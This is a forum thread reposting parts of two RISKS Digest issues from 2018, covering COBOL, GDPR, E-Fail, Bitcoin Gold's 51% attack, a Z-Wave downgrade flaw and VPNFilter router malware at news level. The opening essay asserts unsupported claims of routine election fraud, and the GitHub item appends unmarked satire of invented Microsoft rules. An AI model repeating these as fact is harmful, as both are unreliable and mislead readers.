    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something, In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
    ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
    COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're suppose to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPPA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. Medical insurance industry should take note enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
     
  5. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.71

    RISKS List Owner

    Jun 5, 2018 3:56 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 5 May 2018 Volume 30 : Issue 71

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Microsoft to acquire GitHub for $7.5 billion (Lauren Weinstein)
    Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)
    Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)
    Google to remove "secure" indicator from HTTPS pages on Chrome (Keith Medcalf,
    (Gene Wirchenko, John Levine)
    "How your web browser tells you when it's safe" (Gregg Keizer)
    "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)
    FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)
    Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)
    How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)
    Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)
    YouTube stars' fury over algorithm tests (BBC.com)
    Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later (Fortune)
    Amazon's Echo privacy flub has big implications for IT (Evan Schuman)
    "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)
    License Plate Risks (Jeremy Ardley)
    "Jira bug exposed private server keys at major companies, researcher finds"
    (Zack Whittaker)
    Google Started a Political Sh*tstorm Because of Its Over-Reliance on
    Wikipedia (Motherboard)
    Signs of sophisticated cellphone spying found near White House, U.S.
    officials say (WaPo)
    Massive Visa Outage Shows the Fragility of Global Payments (WiReD)
    How can criminals manipulate cryptocurrency markets?
    (The Conversation)
    Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds of User
    Email Addresses (Gizmodo)
    Commentary: GDPR Misses the Point (Fortune)
    GDPR, Privacy, and CISSPforum vs "Community" (Rob Slade)
    German spy agency can keep tabs on Internet hubs: court (Phys)
    Trendism and cognitive stagnation (John Ohno)
    Re: Securing Elections (Amos Shapir)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 4 Jun 2018 10:34:09 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Microsoft to acquire GitHub for $7.5 billion

    via NNSquad
    Microsoft Corp. on Monday announced it has reached an agreement to acquire
    GitHub, the world's leading software development platform where more than
    28 million developers learn, share and collaborate to create the
    future. Together, the two companies will empower developers to achieve
    more at every stage of the development lifecycle, accelerate enterprise
    use of GitHub, and bring Microsoft's developer tools and services to new
    audiences.

    All GitHub users forthwith will be required to run Windows 10 or subsequent
    Microsoft operating systems with all privacy options disabled, manage their
    code only by voice via Cortana, and install the new Microsoft Clippy 2018!
    Microsoft Office Assistant on all of their devices. Microsoft will now scan
    all GitHub materials for patent infringement and turn violators over to
    local authorities for arrest.

    ------------------------------

    Date: Sun, 27 May 2018 14:40:13 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)

    NNSquad
    Bitcoin backlash as ‘miners’ suck up electricity, stress power grids in Central Washington

    But it's not simply the scale of requests that is perplexing utility
    staff. Many would-be miners have no understanding of how large power
    purchases work. In one case this winter, miners from China landed their
    private jet at the local airport, drove a rental car to the visitor center
    at the Rocky Reach Dam, just north of Wenatchee, and, according to Chelan
    County PUD officials, politely asked to see the "dam master because we
    want to buy some electricity." Bitcoin fever has created other,
    smaller-scale problems for the utility. Three times a week, on average,
    utility crews in Chelan County discover unpermitted home miners running
    computer servers far too large for the electrical grids of residential
    neighborhoods. In one instance last year, the transformer outside a
    bootleg miner's home overheated and touched off a grass fire, Chelan
    County PUD officials say.

    Just cut these cryptocurrency mining parasites off. Knock them off the
    grid. If they can generate their own power safely, fine. Otherwise, to hell
    with them.

    ------------------------------

    Date: May 26, 2018 at 8:10:52 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)

    Joon Ian Wong, QZ, 24 May 2018
    Every cryptocurrency’s nightmare scenario is happening to Bitcoin Gold

    Bitcoin Gold is a fork, or spin-off, of the original cryptocurrency,
    bitcoin. It shares much of the same code and works in a similar way to
    bitcoin, with Bitcoin Gold miners contributing computational power to
    process new transactions. That also means it faces the same vulnerabilities
    as bitcoin, but without the protections that come from the large, dispersed
    group of people and organizations whose computers are powering the bitcoin
    blockchain.

    In recent days the nightmare scenario for any cryptocurrency is playing out
    for Bitcoin Gold, as an attacker has taken control of its blockchain and
    proceeded to defraud cryptocurrency exchanges. All the Bitcoin Gold in
    circulation is valued at $786 million, according to data provider
    Coinmarketcap. Blockchains are designed to be decentralized but when an
    individual or group acting in concert controls the majority of a
    blockchain's processing power, they can tamper with transactions and pave
    the way for fraud. This is known as a 51% attack.

    The possibility of a 51% attack has been one of the concerns institutions
    such as banks and tech companies have had over the years about using the
    blockchain for transactions; some have worried that the Chinese government
    could at some point endeavor to do that, ordering all of the Chinese bitcoin
    miners to act in concert. It's unlikely for bitcoin, but for smaller
    cryptocurrencies, 51% attacks are a concern, one dramatized on a recent
    episode of HBO's series Silicon Valley.

    Cryptocurrency miners commit their computer processing power--or hash
    power--to adding new transactions to a coin's blockchain. They are rewarded
    in units of the coin in return. The idea is that these incentives create
    competition among miners to add more hash power to the chain. The more hash
    power is added, the better the chances of winning a reward.

    So what's a 51% attack? It's when a single miner controls more than half of
    the hash power on a particular blockchain. When this happens, that miner can
    mess with transactions in a bunch of ways, including spending coins
    twice. This is the *double-spending problem*, a puzzle surrounding digital
    money that has vexed computer scientists for years -- and which was solved
    by bitcoin. But the solution only holds if no single miner controls the
    majority of the hash power on a chain.

    Bitcoin Gold has been experiencing double-spending attacks for at least a
    week, according to forum posts by Bitcoin Gold director of communications
    Edward Iskra. Someone has taken control of more than half of Bitcoin Gold's
    hash rate and is double-spending coins. Since an attacker must spend coins
    in his or her possession, and can't conjure up new coins, the attack is
    somewhat limited.

    What's happening now, according to Iskra, is that exchanges that
    automatically accept large deposits are being targeted. The fraudster
    deposits Bitcoin Gold into an account at an exchange, where coins are
    traded. Once the exchange credits the Bitcoin Gold to the attacker's
    account, the attacker trades those coins for another cryptocurrency and
    withdraws it. The attacker can repeatedly make deposits of the same Bitcoin
    Gold it deposited in the first exchange and profit in this way.

    A bunch of other cryptocurrencies have been attacked in similar ways
    recently. Something called Verge has been hit twice in the last two months,
    leading to $2.7 million being stolen. The exotic-sounding coins Monacoin and
    Electroneum have also suffered from 51% attacks not too long ago.

    ------------------------------

    Date: Sat, 26 May 2018 18:03:44 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome

    Google should be keelhauled for this (or at least the dolts who thought it
    up should be keelhauled, and the sailors doing the hauling should be given
    three toddy's of rum when the googlers' are half-way along the keel). HTTPS
    does not mean that the Web Site is secure. It means that it is transport
    encrypted. Similarly, that the web site is not using SSL/TLS does not mean
    it is unsecure -- it simply means that the transport is not encrypted.

    There is a *LOT* more to being *secure* that merely engaging transport
    security. It should be noted that Google will not detect "forged" or MITM
    certificates, and that as a result much of what they hold out as "secure"
    actually does not even have meaningful transport security.

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Google to remove `secure' indicator from HTTPS pages on Chrome
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: 28 May 2018 11:45:16 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome
    (ZDNet)

    Google previously announced that it would mark HTTP pages as "not
    secure" beginning with Chrome 68 in July.

    By October with Chrome 70, Google will start showing a red "not
    secure" warning when users enter data on HTTP pages. "Previously, HTTP
    usage was too high to mark all HTTP pages with a strong red warning,"
    Google said.

    ------------------------------

    Date: Sun, 27 May 2018 08:54:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "How your web browser tells you when it's safe" (Gregg Keizer)

    Gregg Keizer, Computerworld, 23 May 2018
    https://www.computerworld.com/artic...your-web-browser-tells-you-when-its-safe.html

    As Google moves to change how its Chrome browser flags insecure websites,
    rival browsers may be forced to follow suit. Here's how other browsers
    currently handle website security and what changes they have coming.

    selected text:

    Google last week spelled out the schedule it will use to reverse years of
    advice from security experts when browsing the Web - to "look for the
    padlock." Starting in July, the search giant will mark insecure URLs in its
    market-dominant Chrome, not those that already are secure. Google's goal?
    Pressure all website owners to adopt digital certificates and encrypt the
    traffic of all their pages.

    Security pros praised Google's campaign, and the probable end-game. "I
    won't have to tell my mom to look for the padlock," said Chester Wisniewski,
    principal research scientist at security firm Sophos, of the
    switcheroo. "She can just use her computer."

    [Let us change stuff for the people who do not know much about computers.
    That will make things simpler for them. These two sentences do not belong
    together.]

    But what are Chrome's rivals doing? Marching in step or sticking to
    tradition? Computerworld fired up the Big Four -- Chrome, Mozilla's Firefox,
    Apple's Safari and Microsoft's Edge -- to find out.

    ------------------------------

    Date: Sun, 27 May 2018 09:07:11 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)

    Liam Tung, ZDNet, 25 May 2018
    https://www.zdnet.com/article/smart...ets-attackers-open-your-door-from-yards-away/
    Up to 100 million Internet of Things devices could be at risk.

    starting text:

    Hackers may be able to remotely unlock your smart lock if it relies on the
    Z-Wave wireless protocol.

    According to researchers at UK firm Pen Test Partners, Z-Wave is vulnerable
    to an attack that forces the current secure pairing mechanism, known as S2,
    to an earlier version with known weaknesses, called S0.

    The problem with S0 is that when two devices, like a controller and a smart
    lock, are pairing, it encrypts the key exchange using a hardcoded key
    '0000000000000000'. So, an attacker could capture traffic on the network and
    easily decrypt it to discover the key.

    S2 fixed this problem by employing the Diffie-Hellman algorithm for securely
    sharing secret keys, but the downgrade removes that protection.

    The researchers have posted a video demonstrating the downgrade attack --
    dubbed Z-Shave -- on a Conexis L1 Smart Door Lock from lock manufacture
    Yale. They note that an attacker within about 100 meters could, after the
    downgrade attack, then steal the keys to the smart lock.

    Z-Wave chips are in 100 million smart gadgets, from lights to heating
    systems, but the risk is greater for things with security applications, such
    as locks.

    ------------------------------

    Date: May 27, 2018 at 9:56:50 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)

    Feds take aim at potent VPNFilter malware allegedly unleashed by Russia.
    Dan Goodin, Ars Technica, 25 May 2018

    http://arstechnica.com/information-...t-now-to-kill-malware-infecting-500k-devices/

    The FBI is advising users of consumer-grade routers and network-attached
    storage devices to reboot them as soon as possible to counter
    Russian-engineered malware that has infected hundreds of thousands devices.

    Researchers from Cisco's Talos security team first disclosed the
    existence of the malware on Wednesday. The detailed report said the malware
    infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP,
    and TP-Link. Known as VPNFilter, the malware allowed attackers to collect
    communications, launch attacks on others, and permanently destroy the
    devices with a single command. The report said the malware was developed by
    hackers working for an advanced nation, possibly Russia, and advised users
    of affected router models to perform a factory reset, or at a minimum to
    reboot. Later in the day, The Daily Beast reported that VPNFilter was indeed
    developed by a Russian hacking group, one known by a variety of names,
    including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also
    said the FBI had seized an Internet domain VPNFilter used as a backup means
    to deliver later stages of the malware to devices that were already infected
    with the initial stage 1. The seizure meant that the primary and secondary
    means to deliver stages 2 and 3 had been dismantled, leaving only a third
    fallback, which relied on attackers sending special packets to each infected
    device.

    Limited persistence

    The redundant mechanisms for delivering the later stages address a
    fundamental shortcoming in VPNFilter -- stages 2 and 3 can't survive a
    reboot, meaning they are wiped clean as soon as a device is
    restarted. Instead, only stage 1 remains. Presumably, once an infected
    device reboots, stage 1 will cause it to reach out to the recently seized
    ToKnowAll.com address. The FBI's advice to reboot small office and home
    office routers and NAS devices capitalizes on this limitation. In a
    statement published Friday, FBI officials suggested that users of all
    consumer-grade routers, not just those known to be vulnerable to VPNFilter,
    protect themselves. The officials wrote:

    The FBI recommends any owner of small office and home office routers rebo ot
    the devices to temporarily disrupt the malware and aid the potential
    identification of infected devices. Owners are advised to consider disabling
    remote management settings on devices and secure with strong passwords and
    encryption when enabled. Network devices should be upgraded to the latest
    available versions of firmware.

    In a statement also published Friday, Justice Department officials wrote:

    Owners of SOHO and NAS devices that may be infected should reboot their
    devices as soon as possible, temporarily eliminating the second stage
    malware and causing the first stage malware on their device to call out
    for instructions. Although devices will remain vulnerable to reinfection
    with the second stage malware while connected to the Internet, these
    efforts maximize opportunities to identify and remediate the infection
    worldwide in the time available before Sofacy actors learn of the
    vulnerability in their command-and-control infrastructure.

    The US Department of Homeland Security has also issued a statement advising
    that "all SOHO router owners power cycle (reboot) their devices to
    temporarily disrupt the malware."

    As noted in the statements, rebooting serves the objectives of (1)
    temporarily preventing infected devices from running the stages that collect
    data and other advanced attacks and (2) helping FBI officials to track who
    was infected. Friday's statement said the FBI is working with the non-profit
    Shadow Foundation to disseminate the IP addresses of infected devices to
    ISPs and foreign authorities to notify end users.

    Authorities and researchers still don't know for certain how compromised
    devices are initially infected. They suspect the attackers exploited known
